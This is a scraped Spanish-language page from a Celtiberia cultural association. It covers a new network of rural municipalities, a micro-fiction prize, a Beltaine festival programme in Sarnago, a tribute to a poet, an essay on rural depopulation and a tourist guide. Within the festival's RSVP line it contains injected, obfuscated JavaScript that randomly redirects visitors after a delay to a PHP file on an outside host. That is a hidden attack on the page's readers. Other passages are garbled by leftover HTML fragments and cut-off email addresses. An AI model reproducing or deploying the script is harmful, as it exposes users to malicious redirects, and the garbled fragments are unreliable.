tor el 7.5.2022 con más de una veintena de fundadores'>YA ESTÁ EN MARCHA LA RED DE MUNICIPIOS DE LA CELTIBERIA. Se constituyó en Gotor el 7.5.2022 con más de una veintena de fundadores

Los municipios de la Celtiberia apostamos por la integración y la solidaridad, dos valores muy necesarios en tiempos de crisis y nacionalismos excluyentes. Queremos integrarnos en nuestra Historia, en nuestra identidad, en nuestra excepcional riqueza patrimonial; por ello queremos entroncarnos en Celtiberia, el mítico territorio de los celtíberos y de las Cuatro Culturas (celtibérica, judía, musulmana y cristiana) que se extiende por ocho provincias (Burgos, Cuenca, Guadalajara, Rioja, Segovia, Soria, Teruel y Zaragoza) de cuatro comunidades autónomas: Aragón, las dos Castillas y La Rioja. Promovemos una declaración simbólica, integradora, plenamente compatible con nuestra identidad aragonesa, castellana, riojana y española, pues somos desde siempre tierra de creativos mestizajes. Adscribirse a la Celtiberia supone apostar por los valores que refuerzan la naturaleza, la cultura, la etnografía y la solidaridad que históricamente han distinguido a estas “extremaduras” (tierras de frontera) de comunidades de aldeas o de villa y tierra, concejos abiertos y fueros; somos la tierra de los celtíberos sin esclavos y con hospitalidad, de los concejos libres, del común, del nadie es más que nadie… Somos tierra dura donde echó raíces la libertad de los individuos y de los colectivos. Esta es una de las grandes herencias inmateriales de un patrimonio ecocultural que, sin embargo, es tangible y único en Europa: la Celtiberia de las Cuatro culturas puede ser fuente de riqueza para impulsar el sector agropecuario ecológico, el turismo cultural y la nueva economía digital; en definitiva, potenciador de un desarrollo sostenible que necesitan ya estas tierras marginadas desde el siglo XIX.

Esta red de municipios celtibéricos pretende reconocer el compromiso
de unos pueblos y de sus pobladores con un territorio desde hace dos mil quinientos años. Nos organizamos en este presente difícil, espoleados por la crisis demográfica, la ausencia de servicios y el olvido administrativo que padecemos, para hacer un llamamiento a todos los descendientes, oriundos, afines y gentes que hayan descubierto la pasión por vivir en el histórico solar de la cordillera (Celt)Ibérica. Pretendemos un futuro sostenible, con oportunidades para cualquier iniciativa que busque en este espacio el sentimiento de pertenencia a una comunidad ancestral y un presente que nos haga más felices en nuestro territorio. Pretendemos unirnos en esta red municipal para compartir tantas cosas en común con vistas a generar sinergias que nos hagan prosperar en la nueva sociedad digital participativa.

Nos comprometemos con la naciente red “Municipios de la Celtiberia” para promover iniciativas encaminadas a esos fines de desarrollo sostenible arriba enunciados y revertir la inercia negativa y derrotista de la España vaciada. Los municipios serán nuestra base y sustento, los interlocutores oficiales, si bien las asociaciones culturales locales deben tener voz y un papel destacado en esta red que se regirá por los principios democráticos que ya distinguieron a los antiguos celtíberos y que preservamos -excepcionalmente en Europa por la necesidad de colonos- durante la Edad Media. La Asociación de Amigos de la Celtiberia se propone como órgano observador, en un papel de apoyo, mentorizacion y colaboración desinteresados.

Nacemos con un pequeño germen de municipios de las ocho provincias celtibéricas (Burgos, Cuenca, Guadalajara, La Rioja, Segovia, Soria, Teruel y Zaragoza) con la vocación de abrirnos a todos los que integran las comarcas naturales de la Celtiberia, en la cordillera Ibérica y los rebordes occidentales de la Central (ver mapa); buscaremos así mismo la interacción con todos los actores de la España rural interior. Vamos a promover el hermanamiento y las actividades conjuntas con unos fines y objetivos concretos:

  • Preservación, mantenimiento y promoción de nuestro patrimonio histórico, artístico y etnográfico, de nuestra cultura, leyendas e imaginarios.
  • Preservación de nuestros ecosistemas naturales y de los paisajes antrópicos tradicionales.
  • Valorización y promoción de esta riqueza patrimonial en todas sus dimensiones para el fomento del turismo y las industrias culturales.
  • Promover iniciativas para un desarrollo sostenible en todos los campos: sector agropecuario, industrial, tecnologías digitales, turismo y cultura. 
  • Promover el emprendimiento, la revitalización demográfica de nuestros pueblos: un futuro para los jóvenes y un hábitat idóneo para la infancia.
  • Defender los servicios necesarios para el desarrollo satisfactorio de la vida cotidiana y laboral de un ciudadano del siglo XXI: infraestructuras y servicios suficientes para cubrir las necesidades básicas, comunicaciones (viarias y digitales), vivienda, entretenimiento, etc. Todo ello para provecho de los habitantes permanentes y estacionales.
  • Apostar por la tecnología digital participativa como instrumento de comunicación, intercambio e integración comunitario entre los habitantes de las comarcas naturales y de la Celtiberia.
  • Alineados con un modelo de desarrollo sostenible, defenderemos nuestro territorio frente a las agresiones colonizadoras o abusivas de todo tipo con nuestros recursos naturales: aquellas que no garantizan las compensaciones justas y consentidas a los municipios.
  • Nuestro territorio es un valor para la sociedad que debe ser compensado: el uso de infraestructuras viarias y energéticas o el agua de nuestra tierra tiene un gran valor en todas sus dimensiones (de mercado, patrimonial e intangible).
  • Interlocución con las administraciones supramunicipales para defender nuestros intereses y conseguir los fines que nos proponemos.
  • Apoyo y promoción de leyes que favorezcan una discriminación positiva para el medio rural despoblado (los “nuevos fueros”). Apoyamos la activación de la ley de Desarrollo Sostenible del Medio Rural 45/2007 que, convenientemente actualizada, es un instrumento operativo para nuestros objetivos.
  • Postularse a proyectos financiados por fondos europeos o nacionales, en un momento en que la condición rural, la despoblación, la extensión digital y las identidades culturales cotizan al alza en estas convocatorias.
  • Difusión de identidad y el patrimonio de la Celtiberia en todas sus vertientes.

Estos objetivos, y otros que se detallen en la asamblea de constitución de la red el 7 de mayo, serán asumidos por los municipios aspirantes para entrar en esta red y serán auditados periódicamente por agentes independientes. Juntos podemos conformar un lobby rural territorial que defienda nuestros intereses y nuestra identidad.

Así mismo, la asamblea de municipios concretará los requerimientos, las normas a seguir conjuntamente por los miembros, así como las cuotas anuales para mantener la red. Como muestra simbólica de esta pertenencia, cada localidad colocará la señal metálica homologada de “Municipio de la Celtiberia. Territorio de las Cuatro Culturas” que encabeza esta declaración (con el escudo o símbolo de cada municipio abajo, al modo en el que figura el ejemplo de Gotor) y la colocará visiblemente a la entrada de la población.

III PREMIO DE MICRORRELATOS «AMIGOS DE LA CELTIBERIA»

III PREMIO DE MICRORRELATOS «AMIGOS DE LA CELTIBERIA»



La Asociación de Amigos de la Celtiberia, en su irrenunciable defensa de los valores del territorio de la Celtiberia; atendiendo, además, a la histórica y fundamental aportación de sus gentes en la conformación de la cultura, la sociedad y los caracteres idiosincrásicos de la Península Ibérica, convoca el «III Premio de Microrrelatos Amigos de la Celtiberia» con el propósito de reconstruir, estéticamente también, un espacio singular y rescatarlo del olvido. El premio se regirá por las siguientes



BASES

1.- Se establecen tres categorías: Categoría general, a la que podrán concurrir todos aquellos autores mayores de 18 años; Categoría comarcal, a la que podrán presentar sus originales autores nacidos o residentes en la Comarca del Aranda; y Categoría juvenil, a la que podrán optar autores que, en la fecha de finalización del plazo de presentación de originales, no hayan cumplido los 18 años. En todas las categorías, las obras que se presenten a concurso deberán estar escritas en lengua castellana. Las obras deberán ser inéditas y originales. No deben haber sido premiadas anteriormente ni hallarse pendientes de fallo en otros concursos o premios. Se entenderá como inédita aquella obra que no haya sido reproducida total ni parcialmente en ningún tipo de soporte, tanto gráfico como digital. En cualquier caso, toda obra que resulte premiada con anterioridad en otro concurso, así como aquellas que no superen los controles de publicación en línea, quedarán automáticamente invalidadas.


2.- El premio estará dotado con 300 € en Categoría general, con 300 € en Categoría comarcal y con 200 € en Categoría juvenil, y les será de aplicación la norma fiscal pertinente. Las obras ganadoras se publicarán en la página web http://sosrural.org/. El importe del premio cubrirá todos los derechos que como autor pudieran corresponderle durante los dos años siguientes a la fecha de recepción del premio. En todas las ediciones posteriores, ya sean distribuidas por medios digitales o en soporte físico, deberá figurar imperativamente y en lugar bien visible que la obra ha obtenido el «III Premio de Microrrelatos Amigos de la Celtiberia».


3.- El tema objeto del microrrelato será cualquiera que tenga como escenario el territorio de la Celtiberia; en el texto del microrrelato deberá aparecer obligatoriamente el topónimo «Celtiberia». Cada autor podrá presentar una sola obra original, con una extensión máxima de 350 palabras incluido el título.


4.- La obra se presentará en formato digital como archivo PDF, en diseño de página DIN A4, con tipo de letra Times New Roman de 12 puntos e interlineado 1’5. Los trabajos se identificarán únicamente por el título de la obra, haciéndose constar, al pie del texto, un número de teléfono. No se admiten pseudónimos ni plicas. Cualquier trabajo que no se ajuste a las normas descritas anteriormente será desestimado.


Una vez que se produzca el fallo del jurado, la organización contactará con el autor a través del número de teléfono facilitado a fin de recabar su identidad y los datos necesarios para la entrega del premio. El autor premiado deberá realizar una declaración jurada en la que conste que es autor de la obra, que detenta los derechos de propiedad sobre ella, así como que está libre de obligaciones editoriales o de cualquier otro tipo que comprometan su publicación.


5.- Las obras se enviarán exclusivamente por correo electrónico a la siguiente dirección: to referido al autor. En el «asunto» del mensaje deberá figurar, según el caso, la leyenda: «Premio de Microrrelatos Amigos de la Celtiberia. Categoría general», o «Premio de Microrrelatos Amigos de la Celtiberia. Categoría comarcal», o «Premio de Microrrelatos Amigos de la Celtiberia. Categoría juvenil». El contenido del mensaje consistirá únicamente en un archivo anexo en formato PDF con la obra que se presenta a concurso; el nombre de ese archivo será el título de la obra.

6.- El plazo de admisión de originales comenzará con la publicación de estas bases y concluirá el día 31 de julio de 2022 a las 24:00 horas. Los correos electrónicos recibidos después de esta fecha serán eliminados.

Los organizadores del certamen se reservan el derecho a rechazar aquellos textos que atenten contra la protección de la infancia, la intimidad y el honor de terceros o induzcan, inciten o promuevan cualquier tipo de actuación delictiva, denigratoria o violenta en cualquiera de sus formas. También serán rechazadas las obras que presenten faltas de ortografía.


El jurado estará integrado por personas de reconocida solvencia en las disciplinas de Historia y de Literatura y tomará sus acuerdos por mayoría de votos. El premio podrá ser declarado desierto y no se concederán accésits ni premios ex aequo.

7.- Cualquier incidencia no recogida en estas bases será resuelta por el jurado, cuyo fallo será inapelable.scritores.org 

8.- La entrega del premio se efectuará coincidiendo con los actos programados en el IV Encuentro de la Celtiberia Literaria y Creativa que tendrá lugar en la localidad de Gotor (Zaragoza) durante los días 24 y 25 de septiembre de 2022. El autor que resulte ganador se compromete a recibir el premio personalmente, salvo que resida fuera de España.

9.- No se mantendrá correspondencia con los autores. La dirección de correo indicada está destinada exclusivamente a la recepción de los originales. Dado el carácter completamente anónimo del premio, los trabajos no serán devueltos y se eliminarán definitivamente una vez se produzca el fallo del jurado. No se facilitará información sobre la clasificación de los trabajos ni sobre el desarrollo del concurso.

11.- El hecho de concurrir a este premio implica la aceptación íntegra de estas bases. Todo cuanto no esté contenido en ellas será resuelto por la organización y el pleno del jurado y sus decisiones serán inapelables.

LA RED DE MUNICIPIOS DE LA CELTIBERIA NACE PARA BUSCAR SOLUCIONES EN COMÚN A LOS PROBLEMAS DE LA ESPAÑA VACIADA

Representantes municipales de las 8 provincias más despobladas de España se reunirán en Gotor (Zaragoza) el sábado 7 de mayo.

Celtiberia, el corazón de la España vaciada, quiere volver a latir. Con el objetivo de buscar salidas esperanzadoras a la actual situación, el próximo 7 de mayo se reunirán en Gotor (Zaragoza) alcaldes de las ocho provincias y las cuatro comunidades autónomas españolas más castigadas por el fenómeno de la despoblación. La jornada servirá para debatir y fijar una hoja de ruta, al tiempo que está prevista la creación de una nueva red de municipios que supere la actual división política y administrativa.

La España vaciada no puede esperar más. Sus municipios y su tejido social deben tomar la iniciativa para buscar soluciones, además de otras ayudas que puedan venir de otras instancias públicas y privadas. La radiografía de la catástrofe es demasiado conocida y no hace sino aumentar. Por eso los municipios hemos decidido unirnos, remar juntos en busca de soluciones. A escala municipal no podemos solventar el amplio abanico de graves, profundos y acuciantes problemas, pero sí podemos acometer algunas vías de actuación para paliarlos. Y eso vamos a intentar con esta red municipal.

Los municipios de la Celtiberia apostamos por la integración y la solidaridad, dos valores muy necesarios en tiempos de crisis e ideologías excluyentes. Queremos integrarnos en nuestra historia, en nuestra identidad, en nuestra excepcional riqueza patrimonial; por ello queremos entroncarnos en la Celtiberia, el mítico territorio de los celtíberos y de las Cuatro Culturas (céltica, judía, musulmana y cristiana) que se extiende por ocho provincias (Burgos, Cuenca, Guadalajara, Rioja, Segovia, Soria, Teruel y Zaragoza) de cuatro comunidades autónomas: Aragón, las dos Castillas y La Rioja. Promovemos una declaración simbólica, integradora, plenamente compatible con esas identidades regionales y con la española, pues somos desde siempre tierra de creativos mestizajes. Adscribirse a la Celtiberia supone apostar por los valores que refuerzan la naturaleza, la cultura, la etnografía y la solidaridad que históricamente han distinguido a estas “extremaduras” (tierras de frontera) de comunidades de aldeas o de villa y tierra, concejos abiertos y fueros; esta iniciativa también supone impulsar un territorio de patrimonio ecocultural único en Europa (la Celtiberia de las Cuatro culturas) como fuente de riqueza para impulsar el sector agropecuario ecológico, el turismo cultural y la nueva economía digital; en definitiva, un desarrollo sostenible de estas tierras marginadas desde el siglo XIX.

Esta red de municipios celtibéricos pretende unirnos para compartir retos comunes y generar sinergias que nos hagan prosperar en la nueva sociedad digital participativa. Nos comprometemos para promover iniciativas de desarrollo sostenible y revertir la inercia negativa y derrotista de la España despoblada. Los municipios serán nuestra base y sustento, los interlocutores oficiales, si bien las asociaciones culturales locales deben tener voz y un papel destacado en esta red que se regirá por los principios democráticos que ya distinguieron a los antiguos celtíberos y que preservamos excepcionalmente en Europa medieval por la necesidad de colonos. La Asociación de Amigos de la Celtiberia, promotora del proyecto, será órgano observador que colaborará desinteresadamente.

Nacemos con un puñado de municipios con la vocación de abrirnos a todos los que integran todas las comarcas naturales de la Celtiberia, en la cordillera Ibérica y los rebordes occidentales de la Central (ver mapa). Vamos a promover el hermanamiento y las actividades conjuntas con unos fines concretos: preservación de nuestros ecosistemas naturales y de los paisajes antrópicos tradicionales, apuesta por un modelo de desarrollo sostenible (defensa del territorio frente a las agresiones colonizadoras de todo tipo), preservación y promoción de nuestro patrimonio histórico artístico y etnográfico, de nuestra cultura, leyendas e imaginarios. Estos fines tendrán que asumirlos los municipios aspirantes para entrar en esta red y serán auditados periódicamente. Como muestra simbólica de esta pertenencia, cada localidad colocará la señal metálica homologada de “Municipio de la Celtiberia. Territorio de las Cuatro Culturas” que encabeza esta declaración (con el escudo o símbolo de cada municipio y la colocará visiblemente a la entrada de la población.

Celtiberia, el corazón de la España vaciada, quiere volver a latir volviendo a activar esos concejos libres y emprendedores que la hicieron próspera desde el medievo hasta su vaciamiento. Lo haremos hermanados y asociados para buscar salidas esperanzadoras. Por eso nos reunimos en el municipio promotor de Gotor, en la Celtiberia zaragozana, un puñado de alcaldes de las ocho provincias celtibéricas el sábado 7 de mayo de 2022. Debatiremos y fijaremos una hoja de ruta acompañados de música y hermanamiento en un marco incomparable, otra joya más de nuestro incomparable patrimonio: el convento dominico de la Consolación (s. XVI).

SARNAGO, “LA ALDEA GALA” DE TIERRAS ALTAS DE SORIA CELEBRA BELTAINE

EL SÁBADO 30 DE ABRIL LA FIESTA SE MEZCLARÁ CON LA REIVINDICACIÓN DE VIVIENDAS EN LA ESPAÑA RURAL 

Convocan:   Asociación de Amigos de la Celtiberia y Asociación de Amigos de Sarnago.

    Colaboran Diputación de Soria y Ayto de San Pedro Manrique.

Los resistentes de Sarnago han sido capaces de una hazaña comparable a la de Asterix. No vencieron a los romanos, pero sí a la ruina que amenazaba su pueblo sentenciado por el ICONA en la década de 1950. La Asociación de Amigos de Sarnago ha sido fundamental en este empeño sostenido desde hace cuarenta años. Ahora, tras dos largos años de triste pandemia, el exorcismo revivificador se llama Beltaine, la fiesta de la primavera de la civilización céltica que luego fueron asimiladas por los “mayos” y otros ritos en la cultura rural tradicional, revivirán en las Tierras Altas de Soria. Música, camaradería, comidas, danza, libros, conferencias, ritos y diversión estarán presentes otro año en otra aldea que pondremos en el mapa durante al menos un día… Los organizadores, Asociación de Amigos de Sarnago y Asociación de Amigos de la Celtiberia, quieren también añadir un sentido reivindicativo a la celebración. Los indicadores que radiografían el estado de los territorios la antigua Celtiberia son de sobra conocidos y apuntan hacia el colapso. No queremos hacer más retórica con esto. Sobran palabras y faltan hechos. Por eso apostaremos por una revitalización rural que empieza con la disponibilidad de viviendas, que será el leitmotiv reivindicativo de esta jornada festiva y que se tratará en una sesión.Por eso, simbólicamente vamos a plantar un roble en la dehesa, a la manera de los tradicionales mayos que pretendían fecundar la tierra y propiciar buenas cosechas. Ahora no necesitamos trigo, necesitamos gente y casas para los que vengan.

Todos aquellos que quieran sumarse a la fiesta, siempre reivindicativa, están invitados. La hospitalidad celtíbera está a prueba de todo y no faltará un trozo de carne (el jabalí de Asterix será cordero) y un buen vaso del vino de la Celtiberia.

Beltaine

Las celebraciones comenzaban con la Noche de Walpurgis, encendiéndose hogueras que se apagaban al día siguiente (Beltaine) para encender un simbólico fuego nuevo. Esa noche, en la que como en la que precede a Samhain (la otra gran festividad celta del 1 de noviembre ahora divulgada desde el Imperio como Halloween) vagaban los espíritus, ha sido advocada frecuentemente por el cine de terror. Beltaine (1 de mayo) es una fecha simbólica, fundamental en el calendario celta (más perfecto todavía que el actual gregoriano, como prueba el bronce de Coligny) en el centro de la “Edad del Roble”. Las celebraciones giraban en torno a la naturaleza, ya que la religión celta tenía un preponderante sesgo panteísta.

Estos cultos a la Naturaleza (La Fuente de Vida, la Fuente de Todas las Cosas) fueron recreados con potente sentido mítico en El Druida, de Morgan Llyvelyn, quien pone en boca de Anvar estas palabras:

Más tarde descubriría que los romanos afirmaban que adorábamos a los árboles, pero los romanos sólo ven la superficie de las cosas. Los druidas no adoramos a los árboles, sino que adoramos entre los árboles y con los árboles. Todos juntos adoramos a la Fuente”.

También han quedado testimonios históricos de estas celebraciones primaverales, como éste recogido por John Ramsay en las Islas Británicas durante el siglo XVI:

 “igual que el otro culto público de los druidas, la fiesta de Beltane, creemos que se ejecutaba sobre collados y cerros. Ellos pensaban que era degradante para aquel cuyo templo es el universo, suponer que morase en cualquier casa hecha con las manos. Por esta razón los sacrificios eran ofrendados al aire libre, con frecuencia sobre las cimas de las colinas, donde se les ofrecía el panorama más grandioso de la naturaleza y donde estaban más cercanos a la sede el calor y el orden”.

Tugaimid cuireadh duit ceiliúradh a dhéanamh ar an mBealtáin i bráithreachas agus i síocháin le pobail Cheilteacha uile an domhain

Os invitamos a celebrar Beltane en hermandad y paz con todos los pueblos celtas del mundo

PROGRAMA DE ACTOS.

Sábado, 30 de abril

11’00-11’30 horas:  Recepción de participantes en la plaza del pueblo.

11’30 horas: Debate sobre la vivienda en la Celtiberia rural: medidas para la revitalización, conducido por Ángel Muñoz (AAC) y José María Carrascosa (AAS). Plaza del pueblo (si lloviera se trasladaría, como otros actos, a la escuela-museo).

12’45 horas: Visitas guiada a los hitos principales. Culminará en el castro celtibérico de El Castillo, donde se recitará un poema en gaélico en recuerdo de nuestra vieja lengua céltica.

14’00-16’00 horas: Comida de hospitalidad entre celtíberos

Sobremesa amenizada por música

17’00 horas:  Presentación de la Guía Turística de la Celtiberia y de las cartillas de los celtíberos a cargo de la AAC.

18.00 h. «¿Cuándo comienza la primavera?», Javier Sanz compartirá esta breve disertación con el público

18.30 h. Acto de magia y abrazo de la naturaleza en la dehesa (németon local) a cargo de los y las druidas. Se plantarán robles melojos entorno a un mayo.

19’30 horas: La hora de los bardos: recital poético, narrativo y musical (Trasnochos)

21.00 horas: Se activan las hogueras de Walpurgis bendecidas por los hombres y mujeres mágicos en presencia de la tribu.

21’30 horas: Banquete nocturno de hermanamiento ofrecido por la Asociación de Amigos de Sarnago

23’00 horas:  Celebración de luz y el estallido de vida primaveral en la hoguera de la Noche de Walpurgis. Música, danza, caelia y otros brebajes en hermandad celtibérica.

Actuación del grupo soriano Trasnochos con música celtibérica.

Convendría que dejarais constancia de cuántas personas vais a venir en:  $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to:sarnago@sarnago.com»>sarnago@sarnago.comHabrá espacio para acampada y estacionamiento de caravanas

Rosendo Tello, poeta celtíbero.

Rosendo Tello es un poeta, y de esa condición básica, que es actitud fundamental ante la vida, derivan su visión panorámica y su ductilidad verbal. Encuentra a esa palabra la docilidad necesaria para ser dicha desde la atalaya de la edad que legítimamente le concede un cuerpo donde resistir los embates biológicos, pero, sobre todo, le concede los instrumentos propios del arte de la palabra para decir, no para describir (que, en sus circunstancias, acaso sería para él lo más fácil). Pero lo más importante, a mi juicio, es que la obra telliana es ejemplo incuestionable del hombre que se conoce a sí mismo y se desarrolla en la acción. Tello no se agota inútilmente en la introspección psicológica; diría más: yo creo que siente horror a los espíritus meramente especulativos. Teme perderse en nebulosas y huye de las ideas puras para cobijarse en su realidad más objetiva y tangible. Sin embargo, se siente seguro entre esos hitos, en el reconocimiento puro, sencillo y natural de su edad. Y desde esta serenidad deriva muy probablemente su crear incesante para aumentar la belleza y el valor de la vida, para embellecer una memoria anclada incuestionablemente en la tierra de la que procede, en el límite sur de la Celtiberia donde reside su entorno familiar: el huerto, el monte, el gallo “Rufo”, el padre que hablaba con los árboles, esa infancia, en fin, que no ha dejado de asistirle durante toda su vida y a través de la cual ha peregrinado en todas y cada una de las edades del Rosendo hombre, dialogador hegeliano, árbol él mismo mágico y fecundo, hontanar semántico y verbo corregidor del secano.

Su obra es un sólo libro lleno de luz, iluminado por su palabra. Su obra luce de policromías y es ahora cuando unos cuantos y escogidos amigos muy cercanos le rendimos un homenaje reparador que quiere ser, a su vez, una llamada de atención para la olvidadiza exégesis de la literatura española contemporánea.

Gracias a Luis Felipe Alegre – Chusé Aragüés – Javier Barreiro – Carlos Bozalongo – Adolfo Burriel -Borque – Antón Castro – Mariano Castro – José Antonio Conde – José Luis Corral -Juan Domínguez Lasierra – Javier Fernández López – Ángel Guinda – José Carlos Mainer – Manuel Martínez-Forega – José Luis Melero – Emilio Quintanilla Buey – Inés Ramón – Trinidad Ruiz Marcellán – Rosendo Tello Aína – José Verón Gormaz – Miguel Ángel Yusta y a los ilustradores Tomás Roures, Miguel Ángel Dom´ínguez, Josian Pastor y Berna Martínez-Forega, autora, además, de la fotografía de cubierta.

Bergson y Bodei ≠ Kojève y Fukuyama

Este texto de 2005 (que aparecerá en el volumen V de El viaje exterior. Ensayos censores), avanza el porqué de las recientes movilizaciones e invocaciones de legitimidad de los intranacionalismos fundadas en el histórico saqueo demográfico de la España rural.

«El tiempo, en general, lo mismo que la lengua, es pura potencialidad que sólo el acto determina, fundamentando así el presente… De manera que el acto es el ‘después’ empírico de un ‘antes’ puro». Tomando esta lectura vital de Henri Bergson respecto a la propuesta aristotélica de la potencialidad y la acción del ser, Remo Bodei la actualiza para trasladarla a una realidad de clara eminencia política: «La potencia» —dice Bodei— «es una forma de pasado no cronológico y el acto la percepción. En esta percepción se inscribe el reconocimiento del presente como única realidad histórica negando la procedencia de un pasado cuando éste es conflictivo para el pensamiento y la práctica política». El objetivo al que apunta Remo Bodei es la negación de la tesis de Kojève o Fukuyama relativas al ‘fin de la historia’, desenmascaradas como fruto ideológico de la voluntad de negar el futuro y vehículo de una concepción que nos transformaría en ‘epígonos o espectadores de nuestro mismo poder-ser’».


Y es que, en efecto, lo que quiere decir Alexandre Kojève es que la lucha moderna por el reconocimiento, basada en la violencia del esclavo-proletario, ha terminado (aunque pueden abrirse otros conflictos); y lo que dice Francis Fukuyama, de manera ideológicamente propagandista, es que la caída del muro de Berlín y la disolución de la Unión Soviética han dejado en el mundo, como vencedor único, a la economía de mercado y, como presunta consecuencia, su forma política: la democracia parlamentaria.


Ocurría, desde luego, y desde hace años, que cualquier reflexión política contraria a esas tesis había desparecido del debate, ni siquiera podía existir como vector potencial en el espacio político. No sólo eso, sino que la naturalidad con que el neoliberalismo expresaba y difundía su pensamiento a través de los guiñoles de sus democracias parlamentarias llegó a cercenar la importancia trascendental de las voces del asociacionismo crítico, de los espacios sociales colaborativos capaces de organizar propuestas distintas, diametralmente opuestas a la uniformidad capitalista. La placidez con que éste ejercía sus métodos llegó a fundar en el egotismo financiero la verdadera importancia del ‘ser’ ciudadano ‘en acto’, cuyas quintaesencias son Bill Gates, Amancio Ortega, Carlos Slim y unos cuantos etcéteras locales en los que nos fijamos con ojos de auténticos cárabos y que son llamados a formar parte de determinados círculos de opinión o a asesorar iniciativas económicas y sociales de trascendencia universal y, consecuentemente, de efectos políticos globales.


Alguien se ha atrevido recientemente a negar esa prevalencia perversa; sin embargo, ha quedado en el ejercicio político una especie de inercia que empuja hacia el ego social y hacia todas sus demás modalidades, poniendo en práctica actitudes que encarecen el subjetivismo y saldan el objetivismo (base de toda democracia sujeta a la ponderación crítica) mientras que, al mismo tiempo, niegan validez participativa a quienes creen en el esfuerzo común y persiguen precisamente la consecución de los legítimos derechos del ‘procomún’, una entidad que, lejos de ser abstracta, muestra ahora con evidencia el paso de ‘ser en potencia’ a ‘ser en acto’. Ya lo es, y actúa, y, sin embargo, el árbol de otro egotismo, el político (es decir, las diferentes versiones y niveles del ejercicio del Poder), está cegando la necesidad de contar con quienes cooperativizan el esfuerzo en defensa de los intereses asociativos —ya sean institucionales o naturales— por encima de las «ocurrencias» individuales. La concesión de una distinción privada —no importa de qué jerarquía— constata la tendencia a la notabilidad, la misma que niega con horror la hipótesis de su dilución en el anonimato de aquel procomún cada vez más común. Un ejemplo: la jerarquía y la notoriedad territoriales se han impuesto no porque en puridad las ostenten, sino por estrategias mediáticas y por el arqueo de caja político, estrictamente político. Otro ejemplo: el bárbaro desequilibrio entre la España industrializada y la España ruralizada es de tal dimensión que hoy resulta perfectamente comparable a las relaciones tardofeudales del Renacimiento. El procomún de los territorios ruralizados (¡¡el 85% del total!!) se encuentra permanentemente silenciado y sin herramientas que faciliten su acceso a la dinámica de una verdadera competencia económica. Otro ejemplo: semejante estado de desquilibrio es el resultado de políticas privilegiadoras basadas en la «injusticia» distributiva de la riqueza, ahora —y desde la Transición— moralmente sancionada por la democracia. En fin, el imparable ascenso de las comunidades enriquecidas a costa de aquellas políticas inversoras y de la fuerza de trabajo exógena (procedente de esa España rural) propiciará la exigencia onfálica de mantener su estatus económico a partir de proclamas políticas de segregación. Los intranacionalismos se encuentran a la vuelta de la esquina y se soportarán en ilegítimos fundamentos de diferenciación; dará lo mismo qué tipo de diferenciación, porque la única realidad que los evidenciaría sería el saqueo demográfico del resto del territorio del que forman parte, evidencia que les resulta imperativo ocultar y silenciar. Retomemos a Bodei: «En esta percepción se inscribe el reconocimiento del presente como única realidad histórica negando la procedencia de un pasado cuando éste es conflictivo para el pensamiento y la práctica política».


Y me temo que así ocurrirá

Henri Bergson
Remo Bodei
Alexandre Kojève
Francis Fukuyama (tomada de La Razón)

torio por antonomasia celtibérico'>«Moncayo poético»: un programa literario al pie de la Cordillera Ibérica, territorio por antonomasia celtibérico

Impulsado por dos de nuestros asociados (María José Saénz Rodríguez y Mariano Castro, directores de la Casa del Poeta de Trasmoz) y por Olifante. Ediciones de Poesía, con sede en Litago, el pasado sábado 30 de octubre, en Litago por la mañana y en Trasmoz por la tarde, se inauguró el programa «Moncayo poético». Esta sesión inaugural contó con la presencia de Celia Carrasco Gil, que dio una lección de poesía y otra igualmente importante de sinceridad, modestia e inteligencia literaria. «Entre temporal y frente» y «Selvación» son las dos últimas y perturbadoras entregas de un ser poéticamente singular y estéticamente renovador que ocupa un espacio anejo a su jovencísima y gentil presencia y, a la vez, feliz y sorprendentemente alejada de la tozuda petulancia inane de muchísima de la última y penúltima poesía española. Fue un verdadero placer escuchar sus lecturas y la fundamentada destilación de su pensamiento. ¡Bravo! El primer aldabonazo lo dio en Olifante («Entre temporal y frente», 2020).

Lo mejor: el programa nace para proseguir cada mes con el mismo digno propósito y el benéfico objetivo de difundir la poesía y de construir espacios de cultura literaria en el centro de la España vaciada y rural, en pleno territorio celtibérico.

Guía de la Celtiberia

LA GUÍA QUE ESTÁ PONIENDO LA CELTIBERIA EN EL MAPA

Nuestra asociación ha tenido un papel fundamental en la gestación, elaboración y difusión de la Guía turística de la Celtiberia. Un páis imaginado. El editor principal, Rafael Yuste, es miembro, así como el coordinador de los textos, Javie Hernández Ruiz, y la mayoría de los coordinadores de capítulos: Ángel Muñoz (Geografía), Manuel Martínez Forega (Literatura), Yuste y Hernández (Arte) y Alberto Gonzalo (Arqueología), también han colaborado otros socios como Miguel Ángel Dolado (Justicia de Aragón), Marta Chordá, Gabriel Sopeña, Jesús Rubio, JJ Verón (que en paz descanse)….

Esta es la culminación de un proceso de valoración de nuestro patrimonio que empezamos en 1994 con la creación de Develop Celtiberia, el embrión de lo que sería nuestra actual asociación, creada en Almazán (Soria) en 2001. Esperamos que la guía de Prames sea un instrumento adecuado para relanzar uno de los patrimoinos ecoculturales más fascinantes de Europa, el páis de las Cuatro Culturas (la celta y las tres del Libro). Nuestras tierras abandonadas y marginadas lo necesitan como agua de primavera.

La guía se presentó en primicia en el marco del III Encuentro de la Celtiberia Literaria y Creativa con gran éxito de participación. El 20 de octubre se prsentará en Zaragoza, en el Aula Magna del Paraninfo (19 h.) y al día siguiente en Calatayud, en la sede de la Comarca (19.30 h.), Luego vendrá Soria, Teruel, Cuenca, Daroca, Gallocanta, Logroño e incluso fuera de Celtiberia: Madrid, el Maestrazgo…

La guía ha tenido un gran impacto en los medios, aquí ponemos algunos enlaces donde se pone de relieve este catálogo patrimonial en la naturaleza, arte, etnografía, cultura, imaginarios, etc.: https://www.elconfidencial.com/espana/2021-10-15/celtiberia-pais-inventado-espana-interior_3303148/; to-diario/mostrar/3214929/sabias-ocurrio-celtiberia-dejo-huella-historia» data-type=»URL» data-id=»https://www.elaltojalon.es/texto-diario/mostrar/3214929/sabias-ocurrio-celtiberia-dejo-huella-historia»>https://www.elaltojalon.es/texto-diario/mostrar/3214929/sabias-ocurrio-celtiberia-dejo-huella-historia;https://www.burgosconecta.es/provincia/huella-celtiberia-burgos-20211008115235-nt.html

